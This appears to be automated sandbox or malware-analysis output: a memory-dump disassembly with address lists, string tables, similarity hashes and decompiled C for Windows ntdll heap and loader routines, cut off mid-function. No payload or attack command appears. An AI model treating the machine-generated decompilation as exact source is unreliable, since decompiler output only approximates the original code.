                0x018ba896
                0x018bab0c
                0x018bab0f
                0x018bab15
                0x01902320
                0x01902320
                0x018bab1b
                0x018ba89c
                0x018ba89f
                0x018ba8a2
                0x018ba8a2
                0x018ba8a5
                0x018ba8af
                0x018ba8b3
                0x018ba8b8
                0x018baa66
                0x018ba8be
                0x018ba8c5
                0x018ba8c6
                0x018ba8ce
                0x01902328
                0x01902332
                0x01902337
                0x01902337
                0x018ba8ce
                0x018ba8d4
                0x018ba8d8
                0x018ba8db
                0x018ba8de
                0x018ba8e1
                0x018ba8e5
                0x018ba8e8
                0x018ba8f0
                0x018ba8f3
                0x0190234c
                0x01902350
                0x01902355
                0x01902359
                0x01902359
                0x018ba8f9
                0x018ba901
                0x018baae4
                0x018baae4
                0x018baaea
                0x00000000
                0x018ba907
                0x018ba90a
                0x018ba91d
                0x018ba91d
                0x00000000
                0x018ba910
                0x018ba910
                0x018ba910
                0x018ba914
                0x018ba924
                0x018ba924
                0x018ba924
                0x018ba924
                0x018ba916
                0x018ba91b
                0x00000000
                0x00000000
                0x00000000
                0x018ba91b
                0x018ba925
                0x018ba925
                0x018ba932
                0x018ba936
                0x018ba93c
                0x018ba93c
                0x018ba93c
                0x018bab22
                0x018bab24
                0x018bab27
                0x018bab27
                0x018ba942
                0x018ba944
                0x018baaba
                0x018baabd
                0x018baac0
                0x018baac0
                0x018baac2
                0x018bab2f
                0x018baac4
                0x018baac4
                0x018baac7
                0x018baaca
                0x018baacc
                0x018baace
                0x018baace
                0x018baace
                0x018baad1
                0x018baad1
                0x018baad7
                0x018baad9
                0x00000000
                0x00000000
                0x01902361
                0x01902369
                0x0190236b
                0x00000000
                0x01902371
                0x00000000
                0x01902371
                0x00000000
                0x0190236b
                0x018baac0
                0x018ba94a
                0x018ba94a
                0x018ba94d
                0x018ba94d
                0x018ba950
                0x018ba954
                0x01902376
                0x01902380
                0x018ba95a
                0x018ba95a
                0x018ba95c
                0x018ba95f
                0x018ba961
                0x018ba961
                0x018ba967
                0x018ba96a
                0x018ba972
                0x018baa02
                0x018baa06
                0x018baa10
                0x018baa16
                0x018baa16
                0x018baa1b
                0x018baa21
                0x018baa24
                0x018baa27
                0x018baa29
                0x018baa2c
                0x018baa32
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x018ba978
                0x018ba978
                0x018ba97b
                0x018ba981
                0x018ba996
                0x018ba998
                0x018ba99f
                0x018ba9a2
                0x0190238a
                0x018ba9a8
                0x018ba9a8
                0x018ba9a8
                0x018ba9aa
                0x018ba9ad
                0x018ba9b0
                0x018ba9bb
                0x018ba9be
                0x018ba9c7
                0x018ba9c9
                0x018ba9c9
                0x018ba9cc
                0x018ba9d1
                0x018baa6d
                0x018baa70
                0x018baa73
                0x018baa75
                0x018baa79
                0x018baa7e
                0x018baa82
                0x018baa8f
                0x018baa94
                0x018baa96
                0x01902392
                0x019023a1
                0x019023a1
                0x018baa9c
                0x018baa9f
                0x018baaa2
                0x018baaa2
                0x018baaa8
                0x018baaab
                0x018baaaf
                0x00000000
                0x018baab5
                0x00000000
                0x018baab5
                0x018ba9d7
                0x018ba9d7
                0x018ba9da
                0x018ba9e0
                0x018ba9e3
                0x018ba9e6
                0x018ba9e9
                0x018ba9eb
                0x018ba9fd
                0x018ba9fd
                0x00000000
                0x018ba9eb
                0x00000000
                0x00000000
                0x00000000
                0x018ba983
                0x018ba983
                0x018ba983
                0x018ba987
                0x018ba995
                0x018ba995
                0x018ba995
                0x018ba995
                0x018ba989
                0x018ba98e
                0x00000000
                0x018ba990
                0x00000000
                0x018ba990
                0x018ba98e
                0x00000000
                0x018ba983
                0x018ba972
                0x018ba90a
                0x018baa34
                0x018baa34
                0x018baa40
                0x018baa43
                0x018baa46
                0x018baa4d
                0x019023ab
                0x019023b2
                0x019023b8
                0x019023be
                0x019023c3
                0x019023c5
                0x019023cb
                0x019023d1
                0x019023d5
                0x019023f6
                0x019023fb
                0x019023d7
                0x019023ec
                0x019023f1
                0x01902403
                0x01902408
                0x01902410
                0x01902417
                0x01902422
                0x01902422
                0x01902417
                0x019023c5
                0x019023b2
                0x00000000

                Strings
                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01902403
                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019022F3
                • HEAP[%wZ]: , xrefs: 019022D7, 019023E7
                • HEAP: , xrefs: 019022E6, 019023F6
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                • API String ID: 0-1657114761
                • Opcode ID: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                • Instruction ID: dafe782a4ffec24e123f3d0b91e9618f95c508c262b7018af55fc5944d27a9cd
                • Opcode Fuzzy Hash: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                • Instruction Fuzzy Hash: F2D1CF74A006069FDB29CF68C4D0BBABBF1BF48304F148569D95ADB781E334EA45CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E018BA229(void* __ecx, void* __edx) {
                				signed int _v20;
                				char _v24;
                				char _v28;
                				void* _v44;
                				void* _v48;
                				void* _v56;
                				void* _v60;
                				void* __ebx;
                				signed int _t55;
                				signed int _t57;
                				void* _t61;
                				intOrPtr _t62;
                				void* _t65;
                				void* _t71;
                				signed char* _t74;
                				intOrPtr _t75;
                				signed char* _t80;
                				intOrPtr _t81;
                				void* _t82;
                				signed char* _t85;
                				signed char _t91;
                				void* _t103;
                				void* _t105;
                				void* _t121;
                				void* _t129;
                				signed int _t131;
                				void* _t133;
                
                				_t105 = __ecx;
                				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                				_t103 = __edx;
                				_t129 = __ecx;
                				E018BDF24(__edx,  &_v28, _t133);
                				_t55 =  *(_t129 + 0x40) & 0x00040000;
                				asm("sbb edi, edi");
                				_t121 = ( ~_t55 & 0x0000003c) + 4;
                				if(_t55 != 0) {
                					_push(0);
                					_push(0x14);
                					_push( &_v24);
                					_push(3);
                					_push(_t129);
                					_push(0xffffffff);
                					_t57 = E018D9730();
                					__eflags = _t57;
                					if(_t57 < 0) {
                						L17:
                						_push(_t105);
                						E0195A80D(_t129, 1, _v20, 0);
                						_t121 = 4;
                						goto L1;
                					}
                					__eflags = _v20 & 0x00000060;
                					if((_v20 & 0x00000060) == 0) {
                						goto L17;
                					}
                					__eflags = _v24 - _t129;
                					if(_v24 == _t129) {
                						goto L1;
                					}
                					goto L17;
                				}
                				L1:
                				_push(_t121);
                				_push(0x1000);
                				_push(_t133 + 0x14);
                				_push(0);
                				_push(_t133 + 0x20);
                				_push(0xffffffff);
                				_t61 = E018D9660();
                				_t122 = _t61;
                				if(_t61 < 0) {
                					_t62 =  *[fs:0x30];
                					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                					__eflags =  *(_t62 + 0xc);
                					if( *(_t62 + 0xc) == 0) {
                						_push("HEAP: ");
                						E0189B150();
                					} else {
                						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                					}
                					_push( *((intOrPtr*)(_t133 + 0xc)));
                					_push( *((intOrPtr*)(_t133 + 0x14)));
                					_push(_t129);
                					E0189B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                					_t65 = 0;
                					L13:
                					return _t65;
                				}
                				_t71 = E018B7D50();
                				_t124 = 0x7ffe0380;
                				if(_t71 != 0) {
                					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				} else {
                					_t74 = 0x7ffe0380;
                				}
                				if( *_t74 != 0) {
                					_t75 =  *[fs:0x30];
                					__eflags =  *(_t75 + 0x240) & 0x00000001;
                					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                						E0195138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                					}
                				}
                				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                				if(E018B7D50() != 0) {
                					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				} else {
                					_t80 = _t124;
                				}
                				if( *_t80 != 0) {
                					_t81 =  *[fs:0x30];
                					__eflags =  *(_t81 + 0x240) & 0x00000001;
                					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                						__eflags = E018B7D50();
                						if(__eflags != 0) {
                							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                						}
                						E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                					}
                				}
                				_t82 = E018B7D50();
                				_t125 = 0x7ffe038a;
                				if(_t82 != 0) {
                					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                				} else {
                					_t85 = 0x7ffe038a;
                				}
                				if( *_t85 != 0) {
                					__eflags = E018B7D50();
                					if(__eflags != 0) {
                						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                					}
                					E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                				}
                				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                				_t91 =  *(_t103 + 2);
                				if((_t91 & 0x00000004) != 0) {
                					E018ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                					_t91 =  *(_t103 + 2);
                				}
                				 *(_t103 + 2) = _t91 & 0x00000017;
                				_t65 = 1;
                				goto L13;
                			}

                0x018ba229
                0x018ba231
                0x018ba23f
                0x018ba242
                0x018ba244
                0x018ba24c
                0x018ba255
                0x018ba25a
                0x018ba25f
                0x01901c76
                0x01901c78
                0x01901c7e
                0x01901c7f
                0x01901c81
                0x01901c82
                0x01901c84
                0x01901c89
                0x01901c8b
                0x01901c9e
                0x01901c9e
                0x01901cab
                0x01901cb2
                0x00000000
                0x01901cb2
                0x01901c8d
                0x01901c92
                0x00000000
                0x00000000
                0x01901c94
                0x01901c98
                0x00000000
                0x00000000
                0x00000000
                0x01901c98
                0x018ba265
                0x018ba265
                0x018ba266
                0x018ba26f
                0x018ba270
                0x018ba276
                0x018ba277
                0x018ba279
                0x018ba27e
                0x018ba282
                0x01901db5
                0x01901dbb
                0x01901dc1
                0x01901dc5
                0x01901de4
                0x01901de9
                0x01901dc7
                0x01901ddc
                0x01901de1
                0x01901def
                0x01901df3
                0x01901df7
                0x01901dfe
                0x01901e06
                0x018ba302
                0x018ba308
                0x018ba308
                0x018ba288
                0x018ba28d
                0x018ba294
                0x01901cc1
                0x018ba29a
                0x018ba29a
                0x018ba29a
                0x018ba29f
                0x01901ccb
                0x01901cd1
                0x01901cd8
                0x01901cea
                0x01901cea
                0x01901cd8
                0x018ba2a9
                0x018ba2af
                0x018ba2bc
                0x01901cfd
                0x018ba2c2
                0x018ba2c2
                0x018ba2c2
                0x018ba2c7
                0x01901d07
                0x01901d0d
                0x01901d14
                0x01901d1f
                0x01901d21
                0x01901d2c
                0x01901d2c
                0x01901d2c
                0x01901d47
                0x01901d47
                0x01901d14
                0x018ba2cd
                0x018ba2d2
                0x018ba2d9
                0x01901d5a
                0x018ba2df
                0x018ba2df
                0x018ba2df
                0x018ba2e4
                0x01901d69
                0x01901d6b
                0x01901d76
                0x01901d76
                0x01901d76
                0x01901d91
                0x01901d91
                0x018ba2ea
                0x018ba2f0
                0x018ba2f5
                0x01901da8
                0x01901dad
                0x01901dad
                0x018ba2fd
                0x018ba300
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                • API String ID: 2994545307-2586055223
                • Opcode ID: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                • Instruction ID: e63587cfd8a1de468d961eb1a77c1e6ee5d0ca8cd4cc3abb1b50e1039c7b3791
                • Opcode Fuzzy Hash: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                • Instruction Fuzzy Hash: 3651F4322056819FE712EB6CC884FA777E8EB80B54F190568F959CB3D1D764EA40CB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E018C8E00(void* __ecx) {
                				signed int _v8;
                				char _v12;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t32;
                				intOrPtr _t35;
                				intOrPtr _t43;
                				void* _t46;
                				intOrPtr _t47;
                				void* _t48;
                				signed int _t49;
                				void* _t50;
                				intOrPtr* _t51;
                				signed int _t52;
                				void* _t53;
                				intOrPtr _t55;
                
                				_v8 =  *0x198d360 ^ _t52;
                				_t49 = 0;
                				_t48 = __ecx;
                				_t55 =  *0x1988464; // 0x74790110
                				if(_t55 == 0) {
                					L9:
                					if( !_t49 >= 0) {
                						if(( *0x1985780 & 0x00000003) != 0) {
                							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                						}
                						if(( *0x1985780 & 0x00000010) != 0) {
                							asm("int3");
                						}
                					}
                					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                				}
                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                				_t43 =  *0x1987984; // 0x15d2be0
                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                					if(_t48 == _t43) {
                						_t50 = 0x5c;
                						if( *_t32 == _t50) {
                							_t46 = 0x3f;
                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                								_t32 = _t32 + 8;
                							}
                						}
                					}
                					_t51 =  *0x1988464; // 0x74790110
                					 *0x198b1e0(_t47, _t32,  &_v12);
                					_t49 =  *_t51();
                					if(_t49 >= 0) {
                						L8:
                						_t35 = _v12;
                						if(_t35 != 0) {
                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
                								_t35 = _v12;
                							}
                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                						}
                						goto L9;
                					}
                					if(_t49 != 0xc000008a) {
                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                							if(_t49 != 0xc00000bb) {
                								goto L8;
                							}
                						}
                					}
                					if(( *0x1985780 & 0x00000005) != 0) {
                						_push(_t49);
                						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                						_t53 = _t53 + 0x1c;
                					}
                					_t49 = 0;
                					goto L8;
                				} else {
                					goto L9;
                				}
                			}

                Strings
                • LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
                • Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
                • minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-3779518884
                • Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                • Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
                • Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                • Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                • API String ID: 2994545307-336120773
                • Opcode ID: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                • Instruction ID: 7634f567299893e3034d005b7b6c428e1a16696b42b82a6bedd463509256956f
                • Opcode Fuzzy Hash: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                • Instruction Fuzzy Hash: 1A312471200500EFD7E1DB9DC889F67B7A8EF01B21F184469F909EB251F670EA80CB69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E018A8794(void* __ecx) {
                				signed int _v0;
                				char _v8;
                				signed int _v12;
                				void* _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v40;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t77;
                				signed int _t80;
                				signed char _t81;
                				signed int _t87;
                				signed int _t91;
                				void* _t92;
                				void* _t94;
                				signed int _t95;
                				signed int _t103;
                				signed int _t105;
                				signed int _t110;
                				signed int _t118;
                				intOrPtr* _t121;
                				intOrPtr _t122;
                				signed int _t125;
                				signed int _t129;
                				signed int _t131;
                				signed int _t134;
                				signed int _t136;
                				signed int _t143;
                				signed int* _t147;
                				signed int _t151;
                				void* _t153;
                				signed int* _t157;
                				signed int _t159;
                				signed int _t161;
                				signed int _t166;
                				signed int _t168;
                
                				_push(__ecx);
                				_t153 = __ecx;
                				_t159 = 0;
                				_t121 = __ecx + 0x3c;
                				if( *_t121 == 0) {
                					L2:
                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                							L6:
                							if(E018A934A() != 0) {
                								_t159 = E0191A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                								__eflags = _t159;
                								if(_t159 < 0) {
                									_t81 =  *0x1985780; // 0x0
                									__eflags = _t81 & 0x00000003;
                									if((_t81 & 0x00000003) != 0) {
                										_push(_t159);
                										E01915510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                										_t81 =  *0x1985780; // 0x0
                									}
                									__eflags = _t81 & 0x00000010;
                									if((_t81 & 0x00000010) != 0) {
                										asm("int3");
                									}
                								}
                							}
                						} else {
                							_t159 = E018A849B(0, _t122, _t153, _t159, _t180);
                							if(_t159 >= 0) {
                								goto L6;
                							}
                						}
                						_t80 = _t159;
                						goto L8;
                					} else {
                						_t125 = 0x13;
                						asm("int 0x29");
                						_push(0);
                						_push(_t159);
                						_t161 = _t125;
                						_t87 =  *( *[fs:0x30] + 0x1e8);
                						_t143 = 0;
                						_v40 = _t161;
                						_t118 = 0;
                						_push(_t153);
                						__eflags = _t87;
                						if(_t87 != 0) {
                							_t118 = _t87 + 0x5d8;
                							__eflags = _t118;
                							if(_t118 == 0) {
                								L46:
                								_t118 = 0;
                							} else {
                								__eflags =  *(_t118 + 0x30);
                								if( *(_t118 + 0x30) == 0) {
                									goto L46;
                								}
                							}
                						}
                						_v32 = 0;
                						_v28 = 0;
                						_v16 = 0;
                						_v20 = 0;
                						_v12 = 0;
                						__eflags = _t118;
                						if(_t118 != 0) {
                							__eflags = _t161;
                							if(_t161 != 0) {
                								__eflags =  *(_t118 + 8);
                								if( *(_t118 + 8) == 0) {
                									L22:
                									_t143 = 1;
                									__eflags = 1;
                								} else {
                									_t19 = _t118 + 0x40; // 0x40
                									_t156 = _t19;
                									E018A8999(_t19,  &_v16);
                									__eflags = _v0;
                									if(_v0 != 0) {
                										__eflags = _v0 - 1;
                										if(_v0 != 1) {
                											goto L22;
                										} else {
                											_t128 =  *(_t161 + 0x64);
                											__eflags =  *(_t161 + 0x64);
                											if( *(_t161 + 0x64) == 0) {
                												goto L22;
                											} else {
                												E018A8999(_t128,  &_v12);
                												_t147 = _v12;
                												_t91 = 0;
                												__eflags = 0;
                												_t129 =  *_t147;
                												while(1) {
                													__eflags =  *((intOrPtr*)(0x1985c60 + _t91 * 8)) - _t129;
                													if( *((intOrPtr*)(0x1985c60 + _t91 * 8)) == _t129) {
                														break;
                													}
                													_t91 = _t91 + 1;
                													__eflags = _t91 - 5;
                													if(_t91 < 5) {
                														continue;
                													} else {
                														_t131 = 0;
                														__eflags = 0;
                													}
                													L37:
                													__eflags = _t131;
                													if(_t131 != 0) {
                														goto L22;
                													} else {
                														__eflags = _v16 - _t147;
                														if(_v16 != _t147) {
                															goto L22;
                														} else {
                															E018B2280(_t92, 0x19886cc);
                															_t94 = E01969DFB( &_v20);
                															__eflags = _t94 - 1;
                															if(_t94 != 1) {
                															}
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															 *_t118 =  *_t118 + 1;
                															asm("adc dword [ebx+0x4], 0x0");
                															_t95 = E018C61A0( &_v32);
                															__eflags = _t95;
                															if(_t95 != 0) {
                																__eflags = _v32 | _v28;
                																if((_v32 | _v28) != 0) {
                																	_t71 = _t118 + 0x40; // 0x3f
                																	_t134 = _t71;
                																	goto L55;
                																}
                															}
                															goto L30;
                														}
                													}
                													goto L56;
                												}
                												_t92 = 0x1985c64 + _t91 * 8;
                												asm("lock xadd [eax], ecx");
                												_t131 = (_t129 | 0xffffffff) - 1;
                												goto L37;
                											}
                										}
                										goto L56;
                									} else {
                										_t143 = E018A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                										__eflags = _t143;
                										if(_t143 != 0) {
                											_t157 = _v12;
                											_t103 = 0;
                											__eflags = 0;
                											_t136 =  &(_t157[1]);
                											 *(_t161 + 0x64) = _t136;
                											_t151 =  *_t157;
                											_v20 = _t136;
                											while(1) {
                												__eflags =  *((intOrPtr*)(0x1985c60 + _t103 * 8)) - _t151;
                												if( *((intOrPtr*)(0x1985c60 + _t103 * 8)) == _t151) {
                													break;
                												}
                												_t103 = _t103 + 1;
                												__eflags = _t103 - 5;
                												if(_t103 < 5) {
                													continue;
                												}
                												L21:
                												_t105 = E018DF380(_t136, 0x1871184, 0x10);
                												__eflags = _t105;
                												if(_t105 != 0) {
                													__eflags =  *_t157 -  *_v16;
                													if( *_t157 >=  *_v16) {
                														goto L22;
                													} else {
                														asm("cdq");
                														_t166 = _t157[5] & 0x0000ffff;
                														_t108 = _t157[5] & 0x0000ffff;
                														asm("cdq");
                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                														if(__eflags > 0) {
                															L29:
                															E018B2280(_t108, 0x19886cc);
                															 *_t118 =  *_t118 + 1;
                															_t42 = _t118 + 0x40; // 0x3f
                															_t156 = _t42;
                															asm("adc dword [ebx+0x4], 0x0");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															_t110 = E018C61A0( &_v32);
                															__eflags = _t110;
                															if(_t110 != 0) {
                																__eflags = _v32 | _v28;
                																if((_v32 | _v28) != 0) {
                																	_t134 = _v20;
                																	L55:
                																	E01969D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                																}
                															}
                															L30:
                															 *_t118 =  *_t118 + 1;
                															asm("adc dword [ebx+0x4], 0x0");
                															E018AFFB0(_t118, _t156, 0x19886cc);
                															goto L22;
                														} else {
                															if(__eflags < 0) {
                																goto L22;
                															} else {
                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                																	goto L22;
                																} else {
                																	goto L29;
                																}
                															}
                														}
                													}
                													goto L56;
                												}
                												goto L22;
                											}
                											asm("lock inc dword [eax]");
                											goto L21;
                										}
                									}
                								}
                							}
                						}
                						return _t143;
                					}
                				} else {
                					_push( &_v8);
                					_push( *((intOrPtr*)(__ecx + 0x50)));
                					_push(__ecx + 0x40);
                					_push(_t121);
                					_push(0xffffffff);
                					_t80 = E018D9A00();
                					_t159 = _t80;
                					if(_t159 < 0) {
                						L8:
                						return _t80;
                					} else {
                						goto L2;
                					}
                				}
                				L56:
                			}

                Strings
                • minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28
                • LdrpDoPostSnapWork, xrefs: 018F9C1E
                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                • API String ID: 2994545307-1948996284
                • Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                • Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
                • Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                • Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E018A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				char _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				char _v24;
                				signed int _t73;
                				void* _t77;
                				char* _t82;
                				char* _t87;
                				signed char* _t97;
                				signed char _t102;
                				intOrPtr _t107;
                				signed char* _t108;
                				intOrPtr _t112;
                				intOrPtr _t124;
                				intOrPtr _t125;
                				intOrPtr _t126;
                
                				_t107 = __edx;
                				_v12 = __ecx;
                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                				_t124 = 0;
                				_v20 = __edx;
                				if(E018ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                					_t112 = _v8;
                				} else {
                					_t112 = 0;
                					_v8 = 0;
                				}
                				if(_t112 != 0) {
                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                						_t124 = 0xc000007b;
                						goto L8;
                					}
                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                					 *(_t125 + 0x34) = _t73;
                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                						goto L3;
                					}
                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                					_t124 = E0189C9A4( *((intOrPtr*)(_t125 + 0x18)));
                					if(_t124 < 0) {
                						goto L8;
                					} else {
                						goto L3;
                					}
                				} else {
                					L3:
                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                						L8:
                						return _t124;
                					}
                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                							goto L5;
                						}
                						_t102 =  *0x1985780; // 0x0
                						if((_t102 & 0x00000003) != 0) {
